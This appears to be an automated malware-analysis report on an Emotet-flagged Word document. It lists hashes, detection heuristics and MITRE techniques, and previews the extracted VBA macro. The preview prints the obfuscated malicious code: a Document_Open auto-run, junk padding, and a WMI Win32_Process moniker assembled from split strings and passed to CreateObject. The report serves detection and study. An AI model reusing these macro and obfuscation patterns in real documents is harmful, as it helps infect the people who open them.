Emotet Office (OLE) malware analysis — malicious · 7498095cccc978f9

MALICIOUS

Office (OLE)

71.6 KB Created: 2019-12-09 20:45:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 803d828755d0fe65bb71ec1847cf74b4 SHA-1: 6c3715b5105363732ad3b5ba53dd534b61af3d6b SHA-256: 7498095cccc978f9e0b4109dd5dd410a15cd876eee1865cf97fdbb165fafcf53

322 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open macro, which is a common execution vector for Emotet. The macro uses CreateObject to launch a WMI process, specifically targeting 'winmgmts' to create a new process, indicating a downloader functionality. ClamAV also identifies the file as Emotet.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7441513-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7441513-1
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5955 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5955 bytes
SHA-256: `114d0ac7b845f2d1ceab27a1e6701a951700711443b6725daa8730efe72773f1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Famjyftcpm" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "Solnxtsanwfpo, 0, 0, MSForms, TextBox" Private Sub Document_open() Dim Osydlehlx, Chkzhwkot If Tczzarwmzw > Fuxkjnwdnsa Then Lvmjmcuadyvdm = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Oknkrsffjmb < Axabizpwkdntq Then Vbhwjgpd = 22 End If If Agfpcwlbyaf < Vmptehaqaedj Then Erqkuvlit = 355 End If Dim Cynilbrz, Qbtdifkcjlte If Tpktgixjc > Plgjfiruadr Then Fyflclkyo = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Wrysjyhzxqs < Secbkjcb Then Ohdlgqmp = 22 End If If Rnnkykcv < Rmeatyiin Then Mlpklfmbj = 355 End If Dim Znyzbutqecw, Orawglpxn If Ncbjdtnps > Mvrgiycmr Then Trdesisltm = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Mzsjmlohiwgf < Adqubcnci Then Yafwhqvse = 22 End If If Qppaclbxk < Nipuzlqdjqidn Then Lbflmbztnb = 355 End If Akrbicbc End Sub Attribute VB_Name = "Lgnkjbfmsbjpf" Attribute VB_Base = "0{AD0BD801-123D-4A4E-B96A-F2D0624E8C91}{01E71656-75DF-40BD-876F-FA9178C9399C}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Updlyphvj" Function Spwjtgklu() Dim Rgvkdycxllx, Ajzfljxnaezw If Yboshxps > Sqaudmxhn Then Baizotzrcvnny = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Wsqhchjsnujdk < Sikbwbgss Then Bxkeccqhpfr = 22 End If If Sshvefqp < Dfdwhvqzxdmgm Then Sgmcxbbbgj = 355 End If Tgxsqzssdfs = Famjyftcpm.Solnxtsanwfpo Dim Viyvfgqegijxe, Dxnphwgfbyjl If Yuholrii > Xccekklkflr Then Dqdpcxwvvvb = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Cithivnwsfu < Qnyfjlzfexib Then Mubgawxicr = 22 End If If Vlsllini < Xpmpihxlkg Then Bbqytfwikh = 355 End If Kkrlhnpnava = Tgxsqzssdfs + Lgnkjbfmsbjpf.Hixjrdklnk + Lgnkjbfmsbjpf.Ngwkgneavqx + Lgnkjbfmsbjpf.Hmncnzvmirks Dim Mmpifpeb, Rxtrxgyzlub If Zoxymraeqncql > Fqheysnrscyz Then Ozbtpqtirrjf = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Jqalxguu < Vdmwfvosfjcob Then Syxzpvshmibc = 22 End If If Nbumdxme < Vdqabyvo Then Eiwvwccvzod = 355 End If Fwagayvtk = Kkrlhnpnava + Lgnkjbfmsbjpf.Cqzejkcrikxai + Lgnkjbfmsbjpf.Ahbsykuibvs Dim Fdlbtgjit, Qiiuxpfnhpyv If Njuvtjpa > Ttrqnksst Then Pjbaycjvrhhlz = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Pnaaeqhdadypa < Fcieyzsuuhgfj Then Hrkqvfssmg = 22 End If If Bwamjyubf < Hxwsftxkyfow Then Jarnjwyqt = 355 End If Spwjtgklu = Chprvmlpmj + Fwagayvtk + Chprvmlpmj Dim Wileuzcy, Qbhjyjukgb If Tgonktyzfad > Tojxapgpxphoq Then Djekzhpe = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Oizufqxnm < Lngmuzvrgzue Then Vvtuqejtqmhgv = 22 End If If Jbdkhrwyyfhun < Tdeyjuesw Then Swtfoecswx = 355 End If End Function Function Akrbicbc() Dim Revygwut, Qlfgejwnmmmhz If Htippjolokui > Afvvnlnaqbkx Then Aqkeqdzc = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Jobaqvjab < Hrlmthgdhe Then Kkyapsrvytq = 22 End If If Knkurkvbsszys < Syezrzqpsvuhk Then Oaamjtwjpuw = 355 End If Mgjidalddet = j + "win" + "mgmt" + "s:Win32_Process" Dim Dpttxgrdxnic, Urgcxobbyf If Whhraqzvkjjw > Ohaxrmlqcl Then Yvqcrowdkkw = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Rcpzlikqkz < Ankifevy Then Eehrvaicelul = 22 End If If Wrrdiynvxb < Muefbhaz Then Rtnjhiuifo = 355 End If Set Motbdzzstl = CreateObject(Mgjidalddet) Dim Wgccharwjkavk, Doxvhiutzme If Eabgzifzeetwf > Xnhmjirrti Then Cndqcnrsjju = Sqr(KaDrP + Sqr(fBLH0X8r)) End If If Oozjdyba < Merdrmjhxhsdm Then Qjoqbntlkvu = 22 End If If Qjppsrqll < Fzcwojlb Then Npnkiitthhw ... (truncated)

SHA-256: 114d0ac7b845f2d1ceab27a1e6701a951700711443b6725daa8730efe72773f1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Famjyftcpm"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Solnxtsanwfpo, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Dim Osydlehlx, Chkzhwkot
If Tczzarwmzw > Fuxkjnwdnsa Then
         Lvmjmcuadyvdm = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Oknkrsffjmb < Axabizpwkdntq Then
         Vbhwjgpd = 22
End If
If Agfpcwlbyaf < Vmptehaqaedj Then
         Erqkuvlit = 355
End If
   Dim Cynilbrz, Qbtdifkcjlte
If Tpktgixjc > Plgjfiruadr Then
         Fyflclkyo = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Wrysjyhzxqs < Secbkjcb Then
         Ohdlgqmp = 22
End If
If Rnnkykcv < Rmeatyiin Then
         Mlpklfmbj = 355
End If
   Dim Znyzbutqecw, Orawglpxn
If Ncbjdtnps > Mvrgiycmr Then
         Trdesisltm = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Mzsjmlohiwgf < Adqubcnci Then
         Yafwhqvse = 22
End If
If Qppaclbxk < Nipuzlqdjqidn Then
         Lbflmbztnb = 355
End If
Akrbicbc
End Sub

Attribute VB_Name = "Lgnkjbfmsbjpf"
Attribute VB_Base = "0{AD0BD801-123D-4A4E-B96A-F2D0624E8C91}{01E71656-75DF-40BD-876F-FA9178C9399C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Updlyphvj"
Function Spwjtgklu()
   Dim Rgvkdycxllx, Ajzfljxnaezw
If Yboshxps > Sqaudmxhn Then
         Baizotzrcvnny = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Wsqhchjsnujdk < Sikbwbgss Then
         Bxkeccqhpfr = 22
End If
If Sshvefqp < Dfdwhvqzxdmgm Then
         Sgmcxbbbgj = 355
End If
Tgxsqzssdfs = Famjyftcpm.Solnxtsanwfpo
   Dim Viyvfgqegijxe, Dxnphwgfbyjl
If Yuholrii > Xccekklkflr Then
         Dqdpcxwvvvb = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Cithivnwsfu < Qnyfjlzfexib Then
         Mubgawxicr = 22
End If
If Vlsllini < Xpmpihxlkg Then
         Bbqytfwikh = 355
End If
Kkrlhnpnava = Tgxsqzssdfs + Lgnkjbfmsbjpf.Hixjrdklnk + Lgnkjbfmsbjpf.Ngwkgneavqx + Lgnkjbfmsbjpf.Hmncnzvmirks
   Dim Mmpifpeb, Rxtrxgyzlub
If Zoxymraeqncql > Fqheysnrscyz Then
         Ozbtpqtirrjf = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Jqalxguu < Vdmwfvosfjcob Then
         Syxzpvshmibc = 22
End If
If Nbumdxme < Vdqabyvo Then
         Eiwvwccvzod = 355
End If
Fwagayvtk = Kkrlhnpnava + Lgnkjbfmsbjpf.Cqzejkcrikxai + Lgnkjbfmsbjpf.Ahbsykuibvs
   Dim Fdlbtgjit, Qiiuxpfnhpyv
If Njuvtjpa > Ttrqnksst Then
         Pjbaycjvrhhlz = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Pnaaeqhdadypa < Fcieyzsuuhgfj Then
         Hrkqvfssmg = 22
End If
If Bwamjyubf < Hxwsftxkyfow Then
         Jarnjwyqt = 355
End If
Spwjtgklu = Chprvmlpmj + Fwagayvtk + Chprvmlpmj
   Dim Wileuzcy, Qbhjyjukgb
If Tgonktyzfad > Tojxapgpxphoq Then
         Djekzhpe = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Oizufqxnm < Lngmuzvrgzue Then
         Vvtuqejtqmhgv = 22
End If
If Jbdkhrwyyfhun < Tdeyjuesw Then
         Swtfoecswx = 355
End If
End Function
Function Akrbicbc()
   Dim Revygwut, Qlfgejwnmmmhz
If Htippjolokui > Afvvnlnaqbkx Then
         Aqkeqdzc = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Jobaqvjab < Hrlmthgdhe Then
         Kkyapsrvytq = 22
End If
If Knkurkvbsszys < Syezrzqpsvuhk Then
         Oaamjtwjpuw = 355
End If
Mgjidalddet = j + "win" + "mgmt" + "s:Win32_Process"
   Dim Dpttxgrdxnic, Urgcxobbyf
If Whhraqzvkjjw > Ohaxrmlqcl Then
         Yvqcrowdkkw = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Rcpzlikqkz < Ankifevy Then
         Eehrvaicelul = 22
End If
If Wrrdiynvxb < Muefbhaz Then
         Rtnjhiuifo = 355
End If
Set Motbdzzstl = CreateObject(Mgjidalddet)
   Dim Wgccharwjkavk, Doxvhiutzme
If Eabgzifzeetwf > Xnhmjirrti Then
         Cndqcnrsjju = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Oozjdyba < Merdrmjhxhsdm Then
         Qjoqbntlkvu = 22
End If
If Qjppsrqll < Fzcwojlb Then
         Npnkiitthhw
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.